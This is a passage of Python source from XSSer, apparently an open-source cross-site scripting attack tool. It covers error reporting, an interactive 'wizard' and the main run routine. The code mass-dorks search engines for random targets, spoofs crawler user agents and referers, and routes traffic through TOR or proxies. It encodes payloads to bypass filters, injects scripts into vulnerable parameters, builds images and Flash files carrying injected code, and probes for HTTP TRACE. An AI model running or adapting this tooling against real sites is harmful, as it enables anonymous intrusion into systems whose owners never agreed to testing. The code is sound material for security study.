  1951. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1952. else:
  1953. if str(key) in str(dest_url):
  1954. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1955. else:
  1956. if key in current_hashes:
  1957. if method == "xsa":
  1958. self.add_failure(dest_url, payload, key, query_string, orig_url, "XSA") # failed!
  1959. elif method == "xsr":
  1960. self.add_failure(dest_url, payload, key, query_string, orig_url, "XSR") # failed!
  1961. elif method == "coo":
  1962. self.add_failure(dest_url, payload, key, query_string, orig_url, "COO") # failed!
  1963. self.report("\n" +"="*45)
  1964. if str(curl_handle.info()["http-code"]) == "404":
  1965. self.report("\n[Error] 404 Not Found: The server has not found anything matching the Request-URI\n")
  1966. elif str(curl_handle.info()["http-code"]) == "403":
  1967. self.report("\n[Error] 403 Forbidden: The server understood the request, but is refusing to fulfill it\n")
  1968. elif str(curl_handle.info()["http-code"]) == "400":
  1969. self.report("\n[Error] 400 Bad Request: The request could not be understood by the server due to malformed syntax\n")
  1970. elif str(curl_handle.info()["http-code"]) == "401":
  1971. self.report("\n[Error] 401 Unauthorized: The request requires user authentication\n\nIf you are trying to authenticate: Login is failing!\n\ncheck:\n- authentication type is correct for the type of realm (basic, digest, gss, ntlm...)\n- credentials 'user:password' are typed correctly\n")
  1972. elif str(curl_handle.info()["http-code"]) == "407":
  1973. self.report("\n[Error] 407 Proxy Authentication Required: XSSer must first authenticate itself with the proxy\n")
  1974. elif str(curl_handle.info()["http-code"]) == "408":
  1975. self.report("\n[Error] 408 Request Timeout: XSSer did not produce a request within the time that the server was prepared to wait\n")
  1976. elif str(curl_handle.info()["http-code"]) == "500":
  1977. self.report("\n[Error] 500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request\n")
  1978. elif str(curl_handle.info()["http-code"]) == "501":
  1979. self.report("\n[Error] 501 Not Implemented: The server does not support the functionality required to fulfill the request\n")
  1980. elif str(curl_handle.info()["http-code"]) == "502":
  1981. self.report("\n[Error] 502 Bad Gateway: The server received an invalid response from the upstream server\n")
  1982. elif str(curl_handle.info()["http-code"]) == "503":
  1983. self.report("\n[Error] 503 Service Unavailable: The server is currently unable to handle the request [OFFLINE!]\n")
  1984. elif str(curl_handle.info()["http-code"]) == "504":
  1985. self.report("\n[Error] 504 Gateway Timeout: The server did not receive a timely response specified by the URI (try: --ignore-proxy)\n")
  1986. elif str(curl_handle.info()["http-code"]) == "0":
  1987. self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
  1988. else:
  1989. self.report("\n[Error] Not injected!. Server responses with http-code different to: 200 OK (" + str(curl_handle.info()["http-code"]) + ")\n")
  1990. if str(curl_handle.info()["http-code"]) == "404":
  1991. self.not_connection = self.not_connection + 1
  1992. elif str(curl_handle.info()["http-code"]) == "503":
  1993. self.forwarded_connection = self.forwarded_connection + 1
  1994. else:
  1995. self.other_connection = self.other_connection + 1
  1996. def check_positive(self, curl_handle, dest_url, payload, query_string):
  1997. """
  1998. Perform extra check for positives
  1999. """
  2000. body = curl_handle.body()
  2001. pass
  2002. def create_options(self, args=None):
  2003. """
  2004. Create options for OptionParser.
  2005. """
  2006. self.optionParser = XSSerOptions()
  2007. self.options = self.optionParser.get_options(args)
  2008. if not self.options:
  2009. return False
  2010. return self.options
  2011. def _get_attack_urls(self):
  2012. """
  2013. Process payload options and make up the payload list for the attack.
  2014. """
  2015. urls = []
  2016. options = self.options
  2017. p = self.optionParser
  2018. if options.imx:
  2019. self.create_fake_image(options.imx, options.script)
  2020. return []
  2021. if options.flash:
  2022. self.create_fake_flash(options.flash, options.script)
  2023. return []
  2024. if options.update:
  2025. self.report('='*75)
  2026. self.report(str(p.version))
  2027. self.report('='*75)
  2028. try:
  2029. print("\nTrying to update to the latest stable version...\n")
  2030. Updater()
  2031. except:
  2032. print("Not any .git repository found!\n")
  2033. print("="*30)
  2034. print("\nTo have working this feature, you should clone XSSer with:\n")
  2035. print("$ git clone https://code.03c8.net/epsylon/xsser\n")
  2036. print("\nAlso you can try this other mirror:\n")
  2037. print("$ git clone https://github.com/epsylon/xsser\n")
  2038. return []
  2039. if options.wizard: # processing wizard template
  2040. if self.user_template is not None:
  2041. self.options.statistics = True # detailed output
  2042. if self.user_template[0] == "DORKING": # mass-dorking
  2043. self.options.dork_file = True
  2044. self.options.dork_mass = True
  2045. elif "http" in self.user_template[0]: # from target url
  2046. self.options.url = self.user_template[0]
  2047. else: # from file
  2048. self.options.readfile = self.user_template[0]
  2049. if self.user_template[1] == "CRAWLER": # crawlering target
  2050. self.options.crawling = "10"
  2051. else: # manual payload (GET or POST)
  2052. if self.user_template_conntype == "GET":
  2053. self.options.getdata = self.user_template[1]
  2054. else:
  2055. self.options.postdata = self.user_template[1]
  2056. if self.user_template[2] == "Proxy: No - Spoofing: Yes":
  2057. self.options.ignoreproxy = True
  2058. self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
  2059. self.options.referer = "127.0.0.1" # spoof referer
  2060. elif self.user_template[2] == "Proxy: No - Spoofing: No":
  2061. self.options.ignoreproxy = True
  2062. else: # using proxy + spoofing
  2063. self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
  2064. self.options.referer = "127.0.0.1" # spoof referer
  2065. if self.user_template[2] is not None:
  2066. self.options.proxy = self.user_template[2]
  2067. else:
  2068. self.options.ignoreproxy = True
  2069. if self.user_template[3] == "Not using encoders":
  2070. pass
  2071. elif self.user_template[3] == "Hex": # Hexadecimal
  2072. self.options.Hex = True
  2073. elif self.user_template[3] == "Str+Une": # StringFromCharCode()+Unescape()
  2074. self.options.Str = True
  2075. self.options.Une = True
  2076. else: # Character encoding mutations
  2077. self.options.Cem = self.user_template[3]
  2078. if self.user_template[4] == "Alertbox": # Classic AlertBox injection
  2079. self.options.finalpayload = "<script>alert('XSS');</script>"
  2080. else:
  2081. if self.user_template[4] is not None: # Inject user script
  2082. self.options.finalpayload = self.user_template[4]
  2083. else: # not final injection
  2084. pass
  2085. else: # exit
  2086. return
  2087. if options.target: # miau!
  2088. self.report('='*75)
  2089. self.report(str(p.version))
  2090. self.report('='*75)
  2091. self.report("Testing [Full XSS audit]... ;-)")
  2092. self.report('='*75)
  2093. self.report("\n[Info] The following actions will be performed at the end:\n")
  2094. self.report(" 1- Output with detailed statistics\n")
  2095. self.report(" 2- Export results to files: \n\n - a) XSSreport.raw \n - b) XSSer_<target>_<datetime>.xml\n")
  2096. self.options.crawling = "99999" # set max num of urls to crawl
  2097. self.options.crawler_width = "5" # set max num of deeping levels
  2098. self.options.statistics = True # detailed output
  2099. self.options.timeout = "60" # timeout
  2100. self.options.retries = "2" # retries
  2101. self.options.delay = "5" # delay
  2102. self.options.threads = "10" # threads
  2103. self.options.followred = True # follow redirs
  2104. self.options.nohead = False # HEAD check
  2105. self.options.reversecheck = True # try to establish a reverse connection
  2106. self.options.fuzz = True # autofuzzing
  2107. self.options.coo = True # COO
  2108. self.options.xsa = True # XSA
  2109. self.options.xsr = True # XSR
  2110. self.options.dcp = True # DCP
  2111. self.options.dom = True # DOM
  2112. self.options.inducedcode = True # Induced
  2113. self.options.fileoutput = True # Important: export results to file (.raw)
  2114. self.options.filexml = "XSSer_" + str(self.options.target) + "_" + str(datetime.datetime.now())+".xml" # export xml
  2115. self.check_trace() # XST
  2116. urls = [options.target]
  2117. if options.url:
  2118. self.report('='*75)
  2119. self.report(str(p.version))
  2120. self.report('='*75)
  2121. if self.options.crawling:
  2122. self.report("Testing [XSS from CRAWLER]...")
  2123. else:
  2124. self.report("Testing [XSS from URL]...")
  2125. self.report('='*75)
  2126. urls = [options.url]
  2127. elif options.readfile:
  2128. self.report('='*75)
  2129. self.report(str(p.version))
  2130. self.report('='*75)
  2131. self.report("Testing [XSS from FILE]...")
  2132. self.report('='*75)
  2133. try:
  2134. f = open(options.readfile)
  2135. urls = f.readlines()
  2136. urls = [ line.replace('\n','') for line in urls ]
  2137. f.close()
  2138. except:
  2139. import os.path
  2140. if os.path.exists(options.readfile) == True:
  2141. self.report('\nThere are some errors opening the file: ', options.readfile, "\n")
  2142. else:
  2143. self.report('\nCannot found file: ', options.readfile, "\n")
  2144. elif options.dork: # dork a query
  2145. self.report('='*75)
  2146. self.report(str(p.version))
  2147. self.report('='*75)
  2148. self.report("Testing [XSS from DORK]... Good luck! ;-)")
  2149. self.report('='*75)
  2150. if options.dork_mass: # massive dorkering
  2151. for e in self.search_engines:
  2152. try:
  2153. dorker = Dorker(e)
  2154. urls = dorker.dork(options.dork)
  2155. i = 0
  2156. for u in urls: # replace original parameter for injection keyword (XSS)
  2157. p_uri = urlparse(u)
  2158. uri = p_uri.netloc
  2159. path = p_uri.path
  2160. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
  2161. for key, value in target_params.items(): # parse params to apply keywords
  2162. for v in value:
  2163. target_params[key] = 'XSS'
  2164. target_url_params = urllib.parse.urlencode(target_params)
  2165. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  2166. urls[i] = u
  2167. i = i + 1
  2168. except Exception as e:
  2169. for reporter in self._reporters:
  2170. reporter.mosquito_crashed(dorker.search_url, str(e.message))
  2171. else:
  2172. if urls is not None:
  2173. for url in urls:
  2174. for reporter in self._reporters:
  2175. reporter.add_link(dorker.search_url, url)
  2176. else:
  2177. if not options.dork_engine:
  2178. options.dork_engine = 'duck' # default search engine [26-08/2019]
  2179. dorker = Dorker(options.dork_engine)
  2180. try:
  2181. urls = dorker.dork(options.dork)
  2182. i = 0
  2183. for u in urls: # replace original parameter for injection keyword (XSS)
  2184. p_uri = urlparse(u)
  2185. uri = p_uri.netloc
  2186. path = p_uri.path
  2187. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
  2188. for key, value in target_params.items(): # parse params to apply keywords
  2189. for v in value:
  2190. target_params[key] = 'XSS'
  2191. target_url_params = urllib.parse.urlencode(target_params)
  2192. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  2193. urls[i] = u
  2194. i = i + 1
  2195. except Exception as e:
  2196. for reporter in self._reporters:
  2197. reporter.mosquito_crashed(dorker.search_url, str(e.message))
  2198. else:
  2199. if urls is not None:
  2200. for url in urls:
  2201. for reporter in self._reporters:
  2202. reporter.add_link(dorker.search_url, url)
  2203. elif options.dork_file: # dork from file ('core/fuzzing/dorks.txt')
  2204. self.report('='*75)
  2205. self.report(str(p.version))
  2206. self.report('='*75)
  2207. self.report("Testing [XSS from DORK]... Good luck! ;-)")
  2208. self.report('='*75)
  2209. try:
  2210. f = open('core/fuzzing/dorks.txt')
  2211. dorks = f.readlines()
  2212. dorks = [ dork.replace('\n','') for dork in dorks ]
  2213. f.close()
  2214. if not dorks:
  2215. print("\n[Error] - Imposible to retrieve 'dorks' from file.\n")
  2216. return
  2217. except:
  2218. if os.path.exists('core/fuzzing/dorks.txt') == True:
  2219. print('[Error] - Cannot open:', 'dorks.txt', "\n")
  2220. return
  2221. else:
  2222. print('[Error] - Cannot found:', 'dorks.txt', "\n")
  2223. return
  2224. if not options.dork_engine:
  2225. options.dork_engine = 'duck' # default search engine [26-08/2019]
  2226. if options.dork_mass: # massive dorkering
  2227. for e in self.search_engines:
  2228. try:
  2229. dorker = Dorker(e)
  2230. for dork in dorks:
  2231. urls = dorker.dork(dork)
  2232. i = 0
  2233. for u in urls: # replace original parameter for injection keyword (XSS)
  2234. p_uri = urlparse(u)
  2235. uri = p_uri.netloc
  2236. path = p_uri.path
  2237. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
  2238. for key, value in target_params.items(): # parse params to apply keywords
  2239. for v in value:
  2240. target_params[key] = 'XSS'
  2241. target_url_params = urllib.parse.urlencode(target_params)
  2242. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  2243. urls[i] = u
  2244. i = i + 1
  2245. except Exception as e:
  2246. for reporter in self._reporters:
  2247. reporter.mosquito_crashed(dorker.search_url, str(e.message))
  2248. else:
  2249. if urls is not None:
  2250. for url in urls:
  2251. for reporter in self._reporters:
  2252. reporter.add_link(dorker.search_url, url)
  2253. else:
  2254. dorker = Dorker(options.dork_engine)
  2255. try:
  2256. for dork in dorks:
  2257. urls = dorker.dork(dork)
  2258. i = 0
  2259. for u in urls: # replace original parameter for injection keyword (XSS)
  2260. p_uri = urlparse(u)
  2261. uri = p_uri.netloc
  2262. path = p_uri.path
  2263. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
  2264. for key, value in target_params.items(): # parse params to apply keywords
  2265. for v in value:
  2266. target_params[key] = 'XSS'
  2267. target_url_params = urllib.parse.urlencode(target_params)
  2268. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  2269. urls[i] = u
  2270. i = i + 1
  2271. except Exception as e:
  2272. for reporter in self._reporters:
  2273. reporter.mosquito_crashed(dorker.search_url, str(e.message))
  2274. else:
  2275. if urls is not None:
  2276. for url in urls:
  2277. for reporter in self._reporters:
  2278. reporter.add_link(dorker.search_url, url)
  2279. if options.crawling: # crawlering target(s)
  2280. nthreads = options.threads
  2281. self.crawled_urls = list(urls)
  2282. all_crawled = []
  2283. try:
  2284. self.options.crawling = int(self.options.crawling)
  2285. except:
  2286. self.options.crawling = 50
  2287. if self.options.crawler_width == None:
  2288. self.options.crawler_width = 2 # default crawlering-width
  2289. else:
  2290. try:
  2291. self.options.crawler_width = int(self.options.crawler_width)
  2292. except:
  2293. self.options.crawler_width = 2 # default crawlering-width
  2294. if self.options.crawler_local == None:
  2295. self.options.crawler_local = False # default crawlering to LOCAL
  2296. for url in set(urls):
  2297. self.report("\n[Info] Crawlering TARGET:", url, "\n\n - Max. limit: "+ str(self.options.crawling)+ " \n - Deep level: "+ str(options.crawler_width))
  2298. crawler = Crawler(self, Curl, all_crawled,
  2299. self.pool)
  2300. crawler.set_reporter(self)
  2301. # now wait for all results to arrive
  2302. while urls:
  2303. self.run_crawl(crawler, urls.pop(), options)
  2304. while not self._landing:
  2305. for reporter in self._reporters:
  2306. reporter.report_state('broad scanning')
  2307. try:
  2308. self.pool.poll()
  2309. except NoResultsPending:
  2310. crawler.cancel()
  2311. break
  2312. if len(self.crawled_urls) >= int(options.crawling) or not crawler._requests:
  2313. self.report("\n[Info] Found enough results... calling all mosquitoes to home!")
  2314. crawler.cancel()
  2315. break
  2316. time.sleep(0.1)
  2317. # re-parse crawled urls from main
  2318. parsed_crawled_urls = []
  2319. for u in self.crawled_urls:
  2320. if "XSS" in u:
  2321. parsed_crawled_urls.append(u)
  2322. else:
  2323. pass
  2324. self.crawled_urls = parsed_crawled_urls
  2325. # report parsed crawled urls
  2326. self.report("\n" + "-"*25)
  2327. self.report("\n[Info] Mosquitoes have found: [ " + str(len(self.crawled_urls)) + " ] possible attacking vector(s)")
  2328. if self.options.verbose:
  2329. self.report("")
  2330. for u in self.crawled_urls:
  2331. if '/XSS' in u:
  2332. u = u.replace("/XSS", "")
  2333. print(" - " + str(u))
  2334. if len(self.crawled_urls) > 0:
  2335. self.report("")
  2336. else:
  2337. self.report("-"*25)
  2338. self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
  2339. return self.crawled_urls
  2340. if not options.imx or not options.flash or not options.xsser_gtk or not options.update:
  2341. return urls
  2342. def run_crawl(self, crawler, url, options):
  2343. def _cb(request, result):
  2344. pass
  2345. def _error_cb(request, error):
  2346. for reporter in self._reporters:
  2347. reporter.mosquito_crashed(url, str(error[0]))
  2348. if DEBUG == True:
  2349. traceback.print_tb(error[2])
  2350. def crawler_main(args):
  2351. return crawler.crawl(*args)
  2352. crawler.crawl(url, int(options.crawler_width),
  2353. int(options.crawling),options.crawler_local)
  2354. def poll_workers(self):
  2355. try:
  2356. self.pool.poll()
  2357. except NoResultsPending:
  2358. pass
  2359. def try_running(self, func, error, args=[]):
  2360. """
  2361. Try running a function and print some error if it fails and exists with
  2362. a fatal error.
  2363. """
  2364. try:
  2365. return func(*args)
  2366. except Exception as e:
  2367. self.report(error)
  2368. if DEBUG == True:
  2369. traceback.print_exc()
  2370. def check_trace(self):
  2371. """
  2372. Check for Cross Site Tracing (XST) vulnerability:
  2373. 1) check HTTP TRACE method enabled (add 'Max-Forwards: 0' to curl command to bypass some 'Anti-antixst' web proxy rules)
  2374. 2) check data sent on reply
  2375. """
  2376. agents = [] # user-agents
  2377. try:
  2378. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  2379. except:
  2380. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
  2381. for line in f:
  2382. agents.append(line)
  2383. agent = random.choice(agents).strip() # set random user-agent
  2384. referer = '127.0.0.1'
  2385. import subprocess, shlex
  2386. self.report('='*75)
  2387. self.report("\n[Info] Trying method: Cross Site Tracing (XST)\n")
  2388. if self.options.xst:
  2389. xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.xst), stdout=subprocess.PIPE)
  2390. if self.options.target:
  2391. xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.target), stdout=subprocess.PIPE)
  2392. line1 = xst.stdout.readline()
  2393. if self.options.verbose:
  2394. print("-"*25 + "\n")
  2395. while True:
  2396. line = xst.stdout.readline()
  2397. if line != '':
  2398. print(line.rstrip())
  2399. else:
  2400. break
  2401. self.report("")
  2402. self.report('-'*50+"\n")
  2403. if "200 OK" in line1.rstrip():
  2404. print("[Info] Target is vulnerable to XST! (Cross Site Tracing) ;-)\n")
  2405. else:
  2406. print("[Info] Target is NOT vulnerable to XST (Cross Site Tracing) ;-(\n")
  2407. if self.options.target:
  2408. self.report('='*75)
  2409. def start_wizard(self):
  2410. """
  2411. Start Wizard Helper
  2412. """
  2413. #step 0: Menu
  2414. ans1=True
  2415. ans2=True
  2416. ans3=True
  2417. ans4=True
  2418. ans5=True
  2419. ans6=True
  2420. #step 1: Where
  2421. while ans1:
  2422. print("""\nA)- Where are your targets?\n
  2423. [1]- I want to enter the url of my target directly.
  2424. [2]- I want to enter a list of targets from a .txt file.
  2425. *[3]- I don't know where are my target(s)... I just want to explore! :-)
  2426. [e]- Exit/Quit/Abort.
  2427. """)
  2428. ans1 = input("Your choice: [1], [2], [3] or [e]xit\n")
  2429. if ans1 == "1": # from url
  2430. url = input("Target url (ex: http(s)://target.com): ")
  2431. if url.startswith("http"):
  2432. ans1 = None
  2433. else:
  2434. print("\n[Error] Your url is not valid!. Try again!")
  2435. pass
  2436. elif ans1 == "2": # from file
  2437. url = input("Path to file (ex: 'targets_list.txt'): ")
  2438. if url == None:
  2439. print("\n[Error] Your are not providing a valid file. Try again!")
  2440. pass
  2441. else:
  2442. ans1 = None
  2443. elif ans1 == "3": # dorking
  2444. url = "DORKING"
  2445. ans1 = None
  2446. elif (ans1 == "e" or ans1 == "E"):
  2447. print("Closing wizard...")
  2448. ans1=None
  2449. ans2=None
  2450. ans3=None
  2451. ans4=None
  2452. ans5=None
  2453. ans6=None
  2454. else:
  2455. print("\nNot valid choice. Try again!")
  2456. #step 2: How
  2457. while ans2:
  2458. print(22*"-")
  2459. print("""\nB)- How do you want to connect?\n
  2460. [1]- I want to connect using GET and select some possible vulnerable parameter(s) directly.
  2461. [2]- I want to connect using POST and select some possible vulnerable parameter(s) directly.
  2462. [3]- I want to "crawl" all the links of my target(s) to found as much vulnerabilities as possible.
  2463. *[4]- I don't know how to connect... Just do it! :-)
  2464. [e]- Exit/Quit/Abort.
  2465. """)
  2466. ans2 = input("Your choice: [1], [2], [3], [4] or [e]xit\n")
  2467. if ans2 == "1": # using GET
  2468. payload = input("GET payload (ex: '/menu.php?q='): ")
  2469. if payload == None:
  2470. print("\n[Error] Your are providing an empty payload. Try again!")
  2471. pass
  2472. else:
  2473. self.user_template_conntype = "GET"
  2474. ans2 = None
  2475. elif ans2 == "2": # using POST
  2476. payload = input("POST payload (ex: 'foo=1&bar='): ")
  2477. if payload == None:
  2478. print("\n[Error] Your are providing an empty payload. Try again!")
  2479. pass
  2480. else:
  2481. self.user_template_conntype = "POST"
  2482. ans2 = None
  2483. elif ans2 == "3": # crawlering
  2484. payload = "CRAWLER"
  2485. ans2 = None
  2486. elif ans2 == "4": # crawlering
  2487. payload = "CRAWLER"
  2488. ans2 = None
  2489. elif (ans2 == "e" or ans2 == "E"):
  2490. print("Closing wizard...")
  2491. ans2=None
  2492. ans3=None
  2493. ans4=None
  2494. ans5=None
  2495. ans6=None
  2496. else:
  2497. print("\nNot valid choice. Try again!")
  2498. #step 3: Proxy
  2499. while ans3:
  2500. print(22*"-")
  2501. print("""\nC)- Do you want to be 'anonymous'?\n
  2502. [1]- Yes. I want to use my proxy and apply automatic spoofing methods.
  2503. [2]- Anonymous?. Yes!!!. I have a TOR proxy ready at: http://127.0.0.1:8118.
  2504. *[3]- Yes. But I haven't any proxy. :-)
  2505. [4]- No. It's not a problem for me to connect directly to the target(s).
  2506. [e]- Exit/Quit.
  2507. """)
  2508. ans3 = input("Your choice: [1], [2], [3], [4] or [e]xit\n")
  2509. if ans3 == "1": # using PROXY + spoofing
  2510. proxy = input("Enter proxy [http(s)://server:port]: ")
  2511. ans3 = None
  2512. elif ans3 == "2": # using TOR + spoofing
  2513. proxy = 'Using TOR (default: http://127.0.0.1:8118)'
  2514. proxy = 'http://127.0.0.1:8118'
  2515. ans3 = None
  2516. elif ans3 == "3": # only spoofing
  2517. proxy = 'Proxy: No - Spoofing: Yes'
  2518. ans3 = None
  2519. elif ans3 == "4": # no spoofing
  2520. proxy = 'Proxy: No - Spoofing: No'
  2521. ans3 = None
  2522. elif (ans3 == "e" or ans3 == "E"):
  2523. print("Closing wizard...")
  2524. ans3=None
  2525. ans4=None
  2526. ans5=None
  2527. ans6=None
  2528. else:
  2529. print("\nNot valid choice. Try again!")
  2530. #step 4: Bypasser(s)
  2531. while ans4:
  2532. print(22*"-")
  2533. print("""\nD)- Which 'bypasser(s' do you want to use?\n
  2534. [1]- I want to inject XSS scripts without any encoding.
  2535. [2]- Try to inject code using 'Hexadecimal'.
  2536. [3]- Try to inject code mixing 'String.FromCharCode()' and 'Unescape()'.
  2537. [4]- I want to inject using 'Character Encoding Mutations' (Une+Str+Hex).
  2538. *[5]- I don't know exactly what is a 'bypasser'... But I want to inject code! :-)
  2539. [e]- Exit/Quit.
  2540. """)
  2541. ans4 = input("Your choice: [1], [2], [3], [4], [5] or [e]xit\n")
  2542. if ans4 == "1": # no encode
  2543. enc = "Not using encoders"
  2544. ans4 = None
  2545. elif ans4 == "2": # enc: Hex
  2546. enc = 'Hex'
  2547. ans4 = None
  2548. elif ans4 == "3": # enc: Str+Une
  2549. enc = 'Str+Une'
  2550. ans4 = None
  2551. elif ans4 == "4": # enc: Mix: Une+Str+Hex
  2552. enc = "Une,Str,Hex"
  2553. ans4 = None
  2554. elif ans4 == "5": # enc: no encode
  2555. enc = 'Not using encoders'
  2556. ans4 = None
  2557. elif (ans4 == "e" or ans4 == "E"):
  2558. print("Closing wizard...")
  2559. ans4=None
  2560. ans5=None
  2561. ans6=None
  2562. else:
  2563. print("\nNot valid choice. Try again!")
  2564. #step 5: Exploiting
  2565. while ans5:
  2566. print(22*"-")
  2567. print("""\nE)- Which final code do you want to 'exploit' on vulnerabilities found?\n
  2568. [1]- I want to inject a classic "Alert" message box.
  2569. [2]- I want to inject my own scripts.
  2570. *[3]- I don't want to inject a final code... I just want to discover vulnerabilities! :-)
  2571. [e]- Exit/Quit.
  2572. """)
  2573. ans5 = input("Your choice: [1], [2], [3] or [e]xit\n")
  2574. if ans5 == "1": # alertbox
  2575. script = 'Alertbox'
  2576. ans5 = None
  2577. elif ans5 == "2": # manual
  2578. script = input("Enter code (ex: '><script>alert('XSS');</script>): ")
  2579. if script == None:
  2580. print("\n[Error] Your are providing an empty script to inject. Try again!")
  2581. pass
  2582. else:
  2583. ans5 = None
  2584. elif ans5 == "3": # no exploit
  2585. script = 'Not exploiting code'
  2586. ans5 = None
  2587. elif (ans5 == "e" or ans5 == "E"):
  2588. print("Closing wizard...")
  2589. ans5=None
  2590. ans6=None
  2591. else:
  2592. print("\nNot valid choice. Try again!")
  2593. #step 6: Final
  2594. while ans6:
  2595. print(22*"-")
  2596. print("\nVery nice!. That's all. Your last step is to -accept or not- this template.\n")
  2597. print("A)- Target:", url)
  2598. print("B)- Payload:", payload)
  2599. print("C)- Privacy:", proxy)
  2600. print("D)- Bypasser(s):", enc)
  2601. print("E)- Final:", script)
  2602. print("""
  2603. [Y]- Yes. Accept it and start testing!.
  2604. [N]- No. Abort it?.
  2605. """)
  2606. ans6 = input("Your choice: [Y] or [N]\n")
  2607. if (ans6 == "y" or ans6 == "Y"): # YES
  2608. start = 'YES'
  2609. print('Good fly... and happy "Cross" hacking !!! :-)\n')
  2610. ans6 = None
  2611. elif (ans6 == "n" or ans6 == "N"): # NO
  2612. start = 'NO'
  2613. print("Aborted!. Closing wizard...")
  2614. ans6 = None
  2615. else:
  2616. print("\nNot valid choice. Try again!")
  2617. if url and payload and proxy and enc and script:
  2618. return url, payload, proxy, enc, script
  2619. else:
  2620. return
  2621. def create_fake_image(self, filename, payload):
  2622. """
  2623. Create -fake- image with code injected
  2624. """
  2625. options = self.options
  2626. filename = options.imx
  2627. payload = options.script
  2628. image_xss_injections = ImageInjections()
  2629. image_injections = image_xss_injections.image_xss(options.imx , options.script)
  2630. return image_injections
  2631. def create_fake_flash(self, filename, payload):
  2632. """
  2633. Create -fake- flash movie (.swf) with code injected
  2634. """
  2635. options = self.options
  2636. filename = options.flash
  2637. payload = options.script
  2638. flash_xss_injections = FlashInjections()
  2639. flash_injections = flash_xss_injections.flash_xss(options.flash, options.script)
  2640. return flash_injections
  2641. def create_gtk_interface(self):
  2642. """
  2643. Create GTK Interface
  2644. """
  2645. options = self.options
  2646. from core.gtkcontroller import Controller, reactor
  2647. uifile = "xsser.ui"
  2648. controller = Controller(uifile, self)
  2649. self._reporters.append(controller)
  2650. if reactor:
  2651. reactor.run()
  2652. else:
  2653. from gi.repository import Gtk
  2654. Gtk.main()
  2655. return controller
  2656. def run(self, opts=None):
  2657. """
  2658. Run xsser.
  2659. """
  2660. self.token_arrived_flag = False # used for --reverse-check
  2661. self.success_arrived_flag = False # used for --reverse-check
  2662. self.token_arrived_hash = None # used for --reverse-check
  2663. self.token_arrived_hashes = [] # used for --reverse-check
  2664. for reporter in self._reporters:
  2665. reporter.start_attack()
  2666. if opts:
  2667. options = self.create_options(opts)
  2668. self.set_options(options)
  2669. if not self.hub:
  2670. self.hub = HubThread(self)
  2671. self.hub.start()
  2672. options = self.options
  2673. if options:
  2674. if self.options.hash is True: # not fuzzing/heuristic when hash precheck
  2675. self.options.fuzz = False
  2676. self.options.script = False
  2677. self.options.coo = False
  2678. self.options.xsa = False
  2679. self.options.xsr = False
  2680. self.options.dcp = False
  2681. self.options.dom = False
  2682. self.options.inducedcode = False
  2683. self.options.heuristic = False
  2684. if self.options.heuristic: # not fuzzing/hash when heuristic precheck
  2685. self.options.fuzz = False
  2686. self.options.script = False
  2687. self.options.coo = False
  2688. self.options.xsa = False
  2689. self.options.xsr = False
  2690. self.options.dcp = False
  2691. self.options.dom = False
  2692. self.options.inducedcode = False
  2693. self.options.hash = False
  2694. if self.options.Cem: # parse input at CEM for blank spaces
  2695. self.options.Cem = self.options.Cem.replace(" ","")
  2696. else:
  2697. pass
  2698. try:
  2699. if self.options.imx: # create -fake- image with code injected
  2700. p = self.optionParser
  2701. self.report('='*75)
  2702. self.report(str(p.version))
  2703. self.report('='*75)
  2704. self.report("[Image XSS Builder]...")
  2705. self.report('='*75)
  2706. self.report(''.join(self.create_fake_image(self.options.imx, self.options.script)))
  2707. self.report('='*75 + "\n")
  2708. except:
  2709. return
  2710. if options.flash: # create -fake- flash movie (.swf) with code injected
  2711. p = self.optionParser
  2712. self.report('='*75)
  2713. self.report(str(p.version))
  2714. self.report('='*75)
  2715. self.report("[Flash Attack! XSS Builder]...")
  2716. self.report('='*75)
  2717. self.report(''.join(self.create_fake_flash(self.options.flash, self.options.script)))
  2718. self.report('='*75 + "\n")
  2719. if options.xsser_gtk:
  2720. self.create_gtk_interface()
  2721. return
  2722. if self.options.wizard: # start a wizard helper
  2723. p = self.optionParser
  2724. self.report('='*75)
  2725. self.report(str(p.version))
  2726. self.report('='*75)
  2727. self.report("[Wizard] Generating XSS attack...")
  2728. self.report('='*75)
  2729. self.user_template = self.start_wizard()
  2730. if self.options.xst: # check for cross site tracing
  2731. p = self.optionParser
  2732. if not self.options.target:
  2733. self.report('='*75)
  2734. self.report(str(p.version))
  2735. self.report('='*75)
  2736. self.report("[XST Attack!] checking for HTTP TRACE method ...")
  2737. self.report('='*75)
  2738. self.check_trace()
  2739. if self.options.reversecheck or self.options.dom: # generate headless embed web browser
  2740. self.driver = self.create_headless_embed_browser()
  2741. if options.checktor:
  2742. url = self.check_tor_url # TOR status checking site
  2743. print('='*75)
  2744. print("")
  2745. print(" _ ")
  2746. print(" /_/_ .'''. ")
  2747. print(" =O(_)))) ...' `. ")
  2748. print(" \_\ `. .'''")
  2749. print(" `..' ")
  2750. print("")
  2751. print('='*75)
  2752. agents = [] # user-agents
  2753. try:
  2754. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  2755. except:
  2756. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
  2757. for line in f:
  2758. agents.append(line)
  2759. agent = random.choice(agents).strip() # set random user-agent
  2760. referer = "127.0.0.1"
  2761. print("\n[Info] Sending request to: " + url + "\n")
  2762. print("-"*25+"\n")
